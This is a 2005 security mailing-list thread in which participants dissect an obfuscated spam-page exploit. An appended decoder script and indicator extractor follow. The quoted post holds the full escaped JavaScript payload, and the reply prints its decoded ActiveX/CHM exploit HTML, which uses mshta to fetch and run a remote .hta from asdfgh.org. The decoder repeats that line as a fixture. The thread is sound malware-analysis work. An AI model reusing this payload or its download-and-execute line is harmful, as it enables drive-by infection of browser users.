[Dshield] Help Needed With Dissection of Exploit

joey nonoyjoey at gmail.com
Wed Aug 10 04:41:40 GMT 2005


After some wrangling with the encrypted code, it decrypts to the following:

<style>#x2,#x3{position:absolute;left:-1000;}</style>
<OBJECT id=x2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<param name="Scrollbars" value="true">
<PARAM NAME="Item1"
VALUE="command;ms-its:icwdial.chm::/icw_overview.htm"></OBJECT>
<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<PARAM NAME="Item1"
VALUE="command;javascript:document.links[0].href='EXEC=,mshta,http://www.asdfgh.org/ppp.hta
 CHM=ieshared.chm
FILE=app_install.htm'%3Bdocument.links[0].click();"></OBJECT>


It seems that it is a CHM exploit (MS05-001, if I am not mistaken),
which will download the .hta file

http:// www.asdfgh.org/ ppp.hta 


On 8/10/05, Nemo Omen <nemoaus at hotmail.com> wrote:
> I became aware of a new piece of spam last week. It tells me I can get bank
> account passwords and transfer some money into my account too. A deal too
> good to refuse. The address is http:/www.asdfgh.org/passwords.html  Don't
> load this site up unless you are happy to infect your machine or use a non
> m/s o/s.
> 
> The displayed page is pretty dull telling me that I need PGP to unencrypt
> the contents. Looking at the page source is more interesting. Below, I
> substituted javascript with XXX. It starts off with a Javascript
> document.write; I don't need to be very clever to determine that it is
> probably writing some sort of malware to my hard disk. I would like a bit of
> help in analysis of this malware.
> 
> 1) What is the name of this exploit?
> 
> 2) I don't know a whole lot about the javascript unescape function; what does
> it do?
> 
> 3) Are the %codes below machine opcodes or something else?
> 
> 4) What are the next steps in analysis of this malware?
> 
> Regards.  Nem
> 
> <script
> language=XXX>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%73%65%6C%66%2E%66%6F%63%75%73%28%29%3B%73%65%74%49%6E%74%65%72%76%61%6C%28%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%27%47%6F%6F%67%6C%65%2E%63%6F%6D%27%22%2C%37%29%3B%7D%3C%2F%73%63%72%69%70%74%3E%0D%0A'));dF('%286Fvw%7Coh%2
> 86H%2856%7B5%285F%2856%7B6%28%3AEsrvlwlrq%286Ddevroxwh%286Eohiw%286D04333%286E%28%3AG%286F2vw%7Coh%286H%283G%283D%286FREMHFW%2853lg%286G%7B5%2853fodvvlg%286Gfovlg%286Ddge%3B%3B3d90g%3Bii044fi0%3C6%3A%3A033dd336e%3Ad44%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Frppdqg%2855%2853YDOXH%286G%2855Uhodwhg%2853Wrslfv%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Exwwrq%2855%2853YDOXH%286G%2855Wh%7Bw%286D%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Zlqgrz%2855%2853YDOXH%286G%2855%2857joredobeodqn%2855%286H%283G%283D%286Fsdudp%2853qdph%286G%2855Vfurooeduv%2855%2853ydoxh%286G%2855wuxh%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Lwhp4%2855%2853YDOXH%286G%2855frppdqg%286Epv0lwv%286Dlfzgldo1fkp%286D%286D2lfzbryhuylhz1kwp%2855%286H%286F2REMHFW%286H%283G%283D%286FREMHFW%2853lg%286G%7B6%2853fodvvlg%286Gfovlg%286Ddge%3B%3B3d90g%3Bii044fi0%3C6%3A%3A033dd336e%3Ad44%286H%283G%283D%286FSDUDP%2853QD
> PH%286G%2855Frppdqg%2855%2853YDOXH%286G%2855Uhodwhg%2853Wrslfv%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Exwwrq%2855%2853YDOXH%286G%2855Wh%7Bw%286D%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Zlqgrz%2855%2853YDOXH%286G%2855%2857joredobeodqn%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Lwhp4%2855%2853YDOXH%286G%2855frppdqg%286Emdydvfulsw%286Dgrfxphqw1olqnv%288E3%288G1kuhi%286G%285%3AH%5BHF%286G%285Fpvkwd%285Fkwws%286D22zzz1dvgijk1ruj2sss1kwd%2853%2853FKP%286Glhvkduhg1fkp%2853ILOH%286Gdssblqvwdoo1kwp%285%3A%28586Egrfxphqw1olqnv%288E3%288G1folfn%285%3B%285%3C%286E%2855%286H%286F2REMHFW%286H%283G%283D%283G%283D%283%3C%283%3C%283%3C3')</script>
> 
> 
> 
> _______________________________________________
> send all posts to list at lists.dshield.org
> To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list
>

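Added example for this thread (editor's code, not from either post): a static decoder for the two-stage obfuscation in the quoted passwords.html source. The first stage is plain %XX URL escaping of ASCII (the "%codes" are escaped characters, not machine opcodes); the second stage is the page's own dF() routine, which unescapes its argument, subtracts a one-digit key taken from the argument's last character, and unescapes again before calling document.write(). The code below reproduces that arithmetic but returns the HTML as a string, so nothing is rendered, fetched or executed. It assumes Node.js, which still provides the legacy escape()/unescape() globals; the two short fixtures are the opening bytes of the encoded strings in the quoted post, the <OBJECT> fixture is the second decoded object from the reply trimmed to its classid and Item1 parameter, and dFEncode() is a helper added only so constructed samples can be round-tripped.

```javascript
// Added example (not code from the original posts): offline decoder for the
// two-stage obfuscation discussed in the thread. Runs under Node.js, which
// still ships the legacy escape()/unescape() that the original page relies on.

// Stage 1: the outer <script> is plain %XX escaping of ASCII text. The legacy
// unescape() maps every %XX to the character with code 0xXX. decodeURIComponent
// is not a drop-in replacement: it throws on %XX sequences that are not valid UTF-8.
function stage1(escaped) {
  return unescape(escaped);
}

// Stage 2: equivalent of the page's dF(s), minus document.write(). The last
// character of the argument is a single-digit shift key (the page uses '3');
// the rest is unescaped, the key is subtracted from every char code, and the
// result is unescaped once more to give the HTML that was written to the page.
function dFDecode(s) {
  const key = parseInt(s.slice(-1), 10);
  const s1 = unescape(s.slice(0, -1));
  let t = '';
  for (let i = 0; i < s1.length; i++) {
    t += String.fromCharCode(s1.charCodeAt(i) - key);
  }
  return unescape(t);
}

// Inverse of dFDecode (helper added for this example only): lets a constructed
// HTML sample be re-encoded so the decoder can be checked by round-trip.
function dFEncode(html, key) {
  const escaped = escape(html);
  let shifted = '';
  for (let i = 0; i < escaped.length; i++) {
    shifted += String.fromCharCode(escaped.charCodeAt(i) + key);
  }
  return escape(shifted) + String(key);
}

// Pull the argument of the dF('...') call out of a page's source text.
function extractDfArgument(pageSource) {
  const m = /dF\('([^']*)'\)/.exec(pageSource);
  return m ? m[1] : null;
}

// Indicators worth pivoting on once the HTML is in the clear: ActiveX class
// ids, plus any http(s) or ms-its: target embedded in a PARAM value.
function extractIndicators(html) {
  const uniq = (a) => [...new Set(a)];
  return {
    classids: uniq(html.match(/clsid:[0-9a-fA-F-]{36}/g) || []),
    urls: uniq(html.match(/(?:https?|ms-its):[^\s'"<>]+/g) || []),
  };
}

// Fixtures. STAGE1_PREFIX and STYLE_SAMPLE are the opening bytes of the two
// encoded strings in the quoted post (STYLE_SAMPLE has the key '3' appended,
// exactly as the page's own dF() call does). X3_OBJECT is the second decoded
// <OBJECT> from the reply, trimmed to its classid and Item1 PARAM and put on
// one line so it can be re-encoded with dFEncode().
const STAGE1_PREFIX =
  '%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E';
const STYLE_SAMPLE =
  '%286Fvw%7Coh%286H%2856%7B5%285F%2856%7B6%28%3AEsrvlwlrq%286Ddevroxwh%286Eohiw%286D04333%286E%28%3AG%286F2vw%7Coh%286H3';
const X3_OBJECT =
  '<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>' +
  '<PARAM NAME="Command" VALUE="Related Topics">' +
  '<PARAM NAME="Item1" VALUE="command;javascript:document.links[0].href=' +
  "'EXEC=,mshta,http://www.asdfgh.org/ppp.hta CHM=ieshared.chm FILE=app_install.htm'" +
  '%3Bdocument.links[0].click();"></OBJECT>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(stage1(STAGE1_PREFIX));   // <script language="javascript">
  console.log(dFDecode(STYLE_SAMPLE));  // <style>#x2,#x3{position:absolute;left:-1000;}</style>
  console.log(extractIndicators(dFDecode(dFEncode(X3_OBJECT, 3))));
}
```

To use it on the real sample, save the page source with a non-browser tool, run extractDfArgument() on the text to get the dF('...') argument, and pass that to dFDecode(); the result is the same HTML the reply shows, with no ActiveX object instantiated and no .hta fetched. The decoded HTML is the artifact to keep: the classid and the ms-its:/mshta targets are what to search for across proxy logs and other samples.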

